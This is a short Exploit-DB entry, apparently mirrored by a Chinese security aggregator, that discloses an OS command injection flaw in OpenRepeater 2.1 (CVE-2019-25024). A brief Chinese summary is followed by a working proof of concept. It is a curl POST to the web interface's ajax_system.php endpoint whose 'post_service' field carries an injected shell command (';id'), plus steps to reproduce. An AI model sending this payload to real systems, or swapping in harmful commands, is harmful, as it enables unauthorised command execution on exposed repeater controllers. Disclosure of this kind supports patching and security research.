[webapps] OpenRepeater 2.1 - OS Command Injection
OpenRepeater 2.1版本存在OS命令注入漏洞。攻击者可通过构造特定Payload发送POST请求至指定URL触发漏洞,执行任意系统命令。 2025-12-3 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:9 收藏

# Exploit Title: OpenRepeater  2.1 - OS Command Injection 
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/OpenRepeater/openrepeater
# Software Link: https://github.com/OpenRepeater/openrepeater
# Version: 2.1 
# Tested on: Ubuntu
# CVE : CVE-2019-25024


Proof Of Concept
# PoC for OS Command Injection in OpenRepeater before version 2.2

# The target URL for the vulnerable endpoint
TARGET_URL="http://openrepeater/functions/ajax_system.php"

# The payload to execute an arbitrary command, e.g., 'id' to demonstrate the vulnerability
PAYLOAD="post_service=;id"

# Sending the payload using curl
curl -X POST -d "$PAYLOAD" "$TARGET_URL"


Steps to Reproduce:
1. Send the POST request.
2. Observe the result and injected command (e.g., uid=...) will appear.
            

文章来源: https://www.exploit-db.com/exploits/52452
如有侵权请联系:admin#unsafe.sh